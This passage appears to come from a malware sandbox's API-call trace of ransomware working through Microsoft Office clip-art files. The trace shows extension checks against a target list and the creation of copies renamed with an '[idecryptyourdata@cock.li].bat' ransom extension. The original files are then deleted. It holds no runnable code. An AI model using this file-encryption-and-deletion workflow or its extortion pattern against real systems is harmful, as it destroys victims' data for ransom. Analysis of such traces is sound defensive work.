(lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152628.WMF") returned 68 [0196.450] lstrlenW (lpString=".jpg") returned 4 [0196.450] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.451] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.451] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.451] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152688.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152688.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0196.451] GetLastError () returned 0x0 [0196.451] ReadFile (in: hFile=0x334, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x8774, lpOverlapped=0x0) returned 1 [0196.666] WriteFile (in: hFile=0x3a0, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x8780, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x8780, lpOverlapped=0x0) returned 1 [0196.679] ReadFile (in: hFile=0x334, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.679] WriteFile (in: hFile=0x3a0, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.679] SetEndOfFile (hFile=0x3a0) returned 1 [0196.684] CloseHandle (hObject=0x3a0) returned 1 [0196.686] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.686] SetEndOfFile (hFile=0x334) returned 1 [0196.697] CloseHandle (hObject=0x334) returned 1 [0196.697] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152688.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.697] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152688.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152688.wmf")) returned 1 [0196.698] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152688.WMF") returned 68 [0196.698] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152688.WMF") returned 68 [0196.698] lstrlenW (lpString=".doc") returned 4 [0196.698] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.698] lstrlenW (lpString=".docx") returned 5 [0196.698] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0196.698] lstrlenW (lpString=".pdf") returned 4 [0196.698] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.698] lstrlenW (lpString=".xls") returned 4 [0196.698] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.698] lstrlenW (lpString=".xlsx") returned 5 [0196.698] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0196.698] lstrlenW (lpString=".ppt") returned 4 [0196.698] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.698] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152688.WMF") returned 68 [0196.698] lstrlenW (lpString=".zip") returned 4 [0196.698] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.698] lstrlenW (lpString=".rar") returned 4 [0196.698] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.698] lstrlenW (lpString=".bz2") returned 4 [0196.698] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.698] lstrlenW (lpString=".7z") returned 3 [0196.698] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.698] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152688.WMF") returned 68 [0196.698] lstrlenW (lpString=".dbf") returned 4 [0196.698] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152688.WMF") returned 68 [0196.699] lstrlenW (lpString=".1cd") returned 4 [0196.699] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152688.WMF") returned 68 [0196.699] lstrlenW (lpString=".jpg") returned 4 [0196.699] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.699] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.699] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.699] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152892.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152892.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0196.700] GetLastError () returned 0x0 [0196.700] ReadFile (in: hFile=0x334, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x29ac, lpOverlapped=0x0) returned 1 [0196.711] WriteFile (in: hFile=0x350, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x29b0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x29b0, lpOverlapped=0x0) returned 1 [0196.713] ReadFile (in: hFile=0x334, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.713] WriteFile (in: hFile=0x350, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.713] SetEndOfFile (hFile=0x350) returned 1 [0196.713] CloseHandle (hObject=0x350) returned 1 [0196.713] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.713] SetEndOfFile (hFile=0x334) returned 1 [0196.714] CloseHandle (hObject=0x334) returned 1 [0196.714] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152892.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.715] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152892.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152892.wmf")) returned 1 [0196.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152892.WMF") returned 68 [0196.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152892.WMF") returned 68 [0196.715] lstrlenW (lpString=".doc") returned 4 [0196.715] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.716] lstrlenW (lpString=".docx") returned 5 [0196.716] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0196.716] lstrlenW (lpString=".pdf") returned 4 [0196.716] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.716] lstrlenW (lpString=".xls") returned 4 [0196.716] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.716] lstrlenW (lpString=".xlsx") returned 5 [0196.716] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0196.716] lstrlenW (lpString=".ppt") returned 4 [0196.716] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152892.WMF") returned 68 [0196.716] lstrlenW (lpString=".zip") returned 4 [0196.716] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.716] lstrlenW (lpString=".rar") returned 4 [0196.716] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.716] lstrlenW (lpString=".bz2") returned 4 [0196.716] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.716] lstrlenW (lpString=".7z") returned 3 [0196.716] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152892.WMF") returned 68 [0196.716] lstrlenW (lpString=".dbf") returned 4 [0196.716] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152892.WMF") returned 68 [0196.716] lstrlenW (lpString=".1cd") returned 4 [0196.716] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152892.WMF") returned 68 [0196.716] lstrlenW (lpString=".jpg") returned 4 [0196.716] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.717] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.717] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.717] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152898.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152898.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0196.718] GetLastError () returned 0x0 [0196.718] ReadFile (in: hFile=0x334, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x1190, lpOverlapped=0x0) returned 1 [0196.730] WriteFile (in: hFile=0x350, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x11a0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x11a0, lpOverlapped=0x0) returned 1 [0196.731] ReadFile (in: hFile=0x334, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.731] WriteFile (in: hFile=0x350, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.731] SetEndOfFile (hFile=0x350) returned 1 [0196.732] CloseHandle (hObject=0x350) returned 1 [0196.732] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.732] SetEndOfFile (hFile=0x334) returned 1 [0196.733] CloseHandle (hObject=0x334) returned 1 [0196.733] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152898.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.733] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152898.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152898.wmf")) returned 1 [0196.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152898.WMF") returned 68 [0196.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152898.WMF") returned 68 [0196.734] lstrlenW (lpString=".doc") returned 4 [0196.734] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.734] lstrlenW (lpString=".docx") returned 5 [0196.734] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0196.734] lstrlenW (lpString=".pdf") returned 4 [0196.734] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.734] lstrlenW (lpString=".xls") returned 4 [0196.734] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.734] lstrlenW (lpString=".xlsx") returned 5 [0196.734] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0196.734] lstrlenW (lpString=".ppt") returned 4 [0196.734] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152898.WMF") returned 68 [0196.734] lstrlenW (lpString=".zip") returned 4 [0196.734] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.734] lstrlenW (lpString=".rar") returned 4 [0196.734] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.734] lstrlenW (lpString=".bz2") returned 4 [0196.734] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.734] lstrlenW (lpString=".7z") returned 3 [0196.734] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152898.WMF") returned 68 [0196.734] lstrlenW (lpString=".dbf") returned 4 [0196.734] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152898.WMF") returned 68 [0196.734] lstrlenW (lpString=".1cd") returned 4 [0196.734] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152898.WMF") returned 68 [0196.735] lstrlenW (lpString=".jpg") returned 4 [0196.735] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.735] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.735] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.735] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153087.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153087.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0196.736] GetLastError () returned 0x0 [0196.736] ReadFile (in: hFile=0x334, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x778, lpOverlapped=0x0) returned 1 [0196.748] WriteFile (in: hFile=0x350, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x780, lpOverlapped=0x0) returned 1 [0196.750] ReadFile (in: hFile=0x334, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.750] WriteFile (in: hFile=0x350, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.750] SetEndOfFile (hFile=0x350) returned 1 [0196.751] CloseHandle (hObject=0x350) returned 1 [0196.751] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.751] SetEndOfFile (hFile=0x334) returned 1 [0196.752] CloseHandle (hObject=0x334) returned 1 [0196.752] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153087.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.752] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153087.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153087.wmf")) returned 1 [0196.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153087.WMF") returned 68 [0196.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153087.WMF") returned 68 [0196.753] lstrlenW (lpString=".doc") returned 4 [0196.753] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.753] lstrlenW (lpString=".docx") returned 5 [0196.753] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0196.753] lstrlenW (lpString=".pdf") returned 4 [0196.753] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.753] lstrlenW (lpString=".xls") returned 4 [0196.753] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.753] lstrlenW (lpString=".xlsx") returned 5 [0196.753] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0196.753] lstrlenW (lpString=".ppt") returned 4 [0196.753] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153087.WMF") returned 68 [0196.753] lstrlenW (lpString=".zip") returned 4 [0196.754] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.754] lstrlenW (lpString=".rar") returned 4 [0196.754] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.754] lstrlenW (lpString=".bz2") returned 4 [0196.754] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.754] lstrlenW (lpString=".7z") returned 3 [0196.754] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153087.WMF") returned 68 [0196.754] lstrlenW (lpString=".dbf") returned 4 [0196.754] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153087.WMF") returned 68 [0196.754] lstrlenW (lpString=".1cd") returned 4 [0196.754] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153087.WMF") returned 68 [0196.754] lstrlenW (lpString=".jpg") returned 4 [0196.754] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.754] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.754] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.755] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153091.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153091.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0196.755] GetLastError () returned 0x0 [0196.755] ReadFile (in: hFile=0x334, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x1fc8, lpOverlapped=0x0) returned 1 [0196.779] WriteFile (in: hFile=0x350, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x1fd0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x1fd0, lpOverlapped=0x0) returned 1 [0196.780] ReadFile (in: hFile=0x334, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.780] WriteFile (in: hFile=0x350, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.780] SetEndOfFile (hFile=0x350) returned 1 [0196.780] CloseHandle (hObject=0x350) returned 1 [0196.780] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.780] SetEndOfFile (hFile=0x334) returned 1 [0196.781] CloseHandle (hObject=0x334) returned 1 [0196.781] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153091.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.109] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153091.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153091.wmf")) returned 1 [0197.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153091.WMF") returned 68 [0197.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153091.WMF") returned 68 [0197.110] lstrlenW (lpString=".doc") returned 4 [0197.110] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.110] lstrlenW (lpString=".docx") returned 5 [0197.110] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0197.110] lstrlenW (lpString=".pdf") returned 4 [0197.110] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.110] lstrlenW (lpString=".xls") returned 4 [0197.110] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.110] lstrlenW (lpString=".xlsx") returned 5 [0197.110] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0197.110] lstrlenW (lpString=".ppt") returned 4 [0197.110] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153091.WMF") returned 68 [0197.110] lstrlenW (lpString=".zip") returned 4 [0197.110] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.110] lstrlenW (lpString=".rar") returned 4 [0197.110] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.110] lstrlenW (lpString=".bz2") returned 4 [0197.110] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.110] lstrlenW (lpString=".7z") returned 3 [0197.110] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153091.WMF") returned 68 [0197.110] lstrlenW (lpString=".dbf") returned 4 [0197.110] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153091.WMF") returned 68 [0197.110] lstrlenW (lpString=".1cd") returned 4 [0197.110] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153091.WMF") returned 68 [0197.111] lstrlenW (lpString=".jpg") returned 4 [0197.111] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.111] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.111] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.111] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153518.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153518.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0197.112] GetLastError () returned 0x0 [0197.112] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x30f0, lpOverlapped=0x0) returned 1 [0197.114] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x3100, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x3100, lpOverlapped=0x0) returned 1 [0197.116] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.116] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.116] SetEndOfFile (hFile=0x340) returned 1 [0197.116] CloseHandle (hObject=0x340) returned 1 [0197.116] SetFilePointerEx (in: 